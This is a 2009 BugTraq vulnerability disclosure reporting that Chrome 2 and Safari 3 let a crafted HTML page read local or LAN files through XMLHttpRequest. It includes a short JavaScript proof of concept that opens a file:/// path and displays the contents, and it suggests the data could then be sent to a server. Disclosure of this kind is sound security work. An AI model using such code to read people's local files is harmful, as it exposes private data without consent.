BugTraq
XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3 Jun 09 2009 04:33PM
pantera_bleed hotmail com (2 replies)

.html can be crafted to force a unaware user to read file from local, and then possibly send it to a server.

var method = "GET"
var URL = "file:///C:/argentina/bsas_junin.txt"
xmlhttp.open( method, URL, true)

This type of request is possible if file is on user local in the user hard disk (CHROME2), in other browser I was able to do the same but with a LAN access to file, no need to write in local hard disk (SAFARI3)

if (xmlhttp != null) {
xmlhttp.open( method, URL, true)
xmlhttp.onreadystatechange=function(){
if (xmlhttp.readyState==4) {
alert(URL + "\n\n" + xmlhttp.responseText)
}
}
}

this is a valid operation javascript can read then xmlhttp.responseText, yes the file content.

After this you can do whatever you want whit the file.

note that you MUST know the file path!!

crafted by: federico.lanusse
pantera_bleed (at) hotmail (dot) com [email concealed]
federico.lanusse (at) clarolab (dot) com [email concealed]

company: clarolab QA team
yeah! lets rock Ateam!!

Chrome ISSUE, with attached POC.
http://code.google.com/p/chromium/issues/detail?id=13671

[ reply ]
Re: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3 Jun 09 2009 09:08PM
Michal Zalewski (lcamtuf coredump cx)
Re: XMLHttpRequest file upload vulnerability Chrome 2 & Safari 3 Jun 09 2009 07:21PM
Adrian P. (ap gnucitizen org)


 

Privacy Statement
Copyright 2010, SecurityFocus